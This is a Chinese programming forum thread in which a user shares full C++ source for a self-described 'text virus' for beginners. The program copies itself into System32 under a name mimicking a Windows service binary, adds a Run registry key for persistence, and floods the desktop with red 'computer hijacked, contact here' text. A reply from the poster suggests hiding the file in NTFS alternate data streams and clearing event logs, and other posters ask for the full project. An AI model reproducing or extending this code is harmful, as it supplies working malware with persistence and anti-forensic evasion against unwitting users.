VC驿站

 找回密码
 加入驿站

QQ登录

只需一步,快速开始

搜索
查看: 183|回复: 6

[交流] 今日一贴。完整端的文字病毒,新手观摩,

[复制链接]
75_avatar_middle
最佳答案
0 
在线会员 发表于 6 天前 | 显示全部楼层 |阅读模式

用于新手研究,strcat(copycmd, "copy \"");//这里需要有一个空格号
                strcat(copycmd, path);
                strcat(copycmd, "\" \"");
                strcat(copycmd, "C:\\Windows\\System32\\WUDFHost32.exe");
                strcat(copycmd, "\"");
                system(copycmd);
上面那里拷贝函数注意空格,不然容易路径语法不对,

#include<iostream>
#include<Windows.h>
//#pragma comment(linker,"/entry:mainCRTStartup/subsystem:window")
using namespace std;



FLOAT p(FLOAT a, WORD b)//获取一个随机数
{
        return rand() % (b+ 1) + a;
}
int main()
{

                //---------------------------------
                char path[MAXBYTE] = { 0 };
                GetModuleFileName(NULL, path, MAXBYTE);

                PVOID oldValue = NULL;
                //Wow64DisableWow64FsRedirection(&oldValue);
                CHAR copycmd[MAXBYTE] = { 0 };
                strcat(copycmd, "copy \"");
                strcat(copycmd, path);
                strcat(copycmd, "\" \"");
                strcat(copycmd, "C:\\Windows\\System32\\WUDFHost32.exe");
                strcat(copycmd, "\"");
                system(copycmd);
                cout << copycmd << endl;
                //Sleep(200000);
                HKEY Hkey = 0;
                RegCreateKeyExA(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
                        0,
                        0,
                        REG_OPTION_NON_VOLATILE,
                        KEY_WOW64_64KEY |/*赋予程序64位的权限以至于程序每次重启自动运行*/
                        KEY_ALL_ACCESS,/*获取所有权限*/
                        NULL,/*不继承*/
                        &Hkey,/*子健指针*/
                        NULL
                );
                RegSetValueExA(Hkey, "Mypro", 0, REG_SZ, (BYTE*)"C:\\Windows\\System32\\WUDFHost32.exe", 35);
                /*写进启动对象*/


                //<-------------------------------------------------------------

                HWND hwnd = FindWindow("Progman", "Program Manager");
                HWND DCHWND = 0;//句柄要初始化,否则会引发异常
                if (hwnd)
                {
                        HWND hShellDdfviex = FindWindowEx(hwnd, NULL, "SHELLDLL_DefView", NULL);
                        if (hShellDdfviex)
                        {
                                DCHWND = FindWindowEx(hShellDdfviex, NULL, "SyslistView32", NULL);
                        }
                }
                cout << "程序运行中" << endl;
                HDC dc = GetDC(DCHWND);//获取桌面句柄的DC(设备上下文)

                //创建字体
                HFONT hf = CreateFont(
                        25,/*自高度*/
                        10,/*字体的宽度*/
                        0,/*字体显示角度*/
                        0,/*字体角度*/
                        5,/*字体粗细*/
                        0,/*斜体*/
                        0,/*带下划线的字体*/
                        0,/*带删除线*/
                        ANSI_CHARSET,/*指定字符集*/
                        OUT_DEFAULT_PRECIS,/*输出的精度*/
                        CLIP_DEFAULT_PRECIS,/*裁剪的精度*/
                        DEFAULT_QUALITY,/*逻辑字体与输出设备之简的精度*/
                        DEFAULT_PITCH | FF_SWISS,/*字体的间距和字体集*/
                        "微软雅黑");

                SetTextColor(dc, RGB(255, 0, 0));/*设置文字颜色*/

                SelectObject(dc, hf);// 将字体和设备上下文建立连接

                SetBkMode(dc, TRANSPARENT);
                //建立循环输出
                while (true)
                {
                        ExtTextOut(dc, p(0, 2560), p(0, 1440), ETO_CLIPPED, NULL, "电脑被劫持,请联系这里你随便填凑够35字符就行", 35, 0);
                        //        ExtTextOut(dc,80, 100, ETO_CLIPPED, NULL, "电脑被劫持", 10, 0);
                        Sleep(10);
                }
                ReleaseDC(DCHWND, dc);


                return true;
       
}
感谢在学习路上帮助我的人,您所学帮助与我,我即了然于胸,必授予他人。




上一篇:C语言做的一个俄罗斯方块控制台应用程序,不能清屏开始游戏求大神帮忙
下一篇:纯win32的屏幕截图

本帖被以下淘专辑推荐:

75_avatar_middle
最佳答案
0 
ico_lz  楼主| 发表于 6 天前 | 显示全部楼层
该代码在VS2017中编译(WIN10系统),用管理员身份运行可将文件成功复制到C盘,并且写入注册表。普通运行则无法写入C盘。  
给您几个思路  修改该文件的隐蔽性,
1 利用NFTS数据流寄宿到别的文件建中,
2 添加系统事件清理代码,
嘿嘿 新手知识有限,有大佬还望补充哈哈
58_avatar_middle
最佳答案
8 
online_vip 发表于 6 天前 | 显示全部楼层
又来考验我们,多放出点代码。
75_avatar_middle
最佳答案
0 
ico_lz  楼主| 发表于 6 天前 | 显示全部楼层
thzzl 发表于 2019-12-2 21:52
又来考验我们,多放出点代码。

我忘记弄成  回复下载了,哈哈
98_avatar_middle
最佳答案
0 
在线会员 发表于 4 天前 | 显示全部楼层
支持一下 整个工程文件
12_avatar_middle
最佳答案
0 
donate_vip 发表于 前天 22:01 | 显示全部楼层
今日一贴。完整端的文字病毒,新手观摩,c++你竟然拿来做病毒。。。
75_avatar_middle
最佳答案
0 
ico_lz  楼主| 发表于 前天 22:33 | 显示全部楼层
斜飞 发表于 2019-12-6 22:01
c++你竟然拿来做病毒。。。

额   那老哥 给推荐个 C++能干啥
您需要登录后才可以回帖 登录 | 加入驿站 qq_login

本版积分规则

关闭

站长提醒上一条 /2 下一条

QQ|小黑屋|手机版|VC驿站 ( 辽ICP备09019393号tongdun|网站地图wx_jqr

GMT+8, 2019-12-8 06:33

Powered by Discuz! X3.4

© 2009-2019 cctry.com

快速回复 返回顶部 返回列表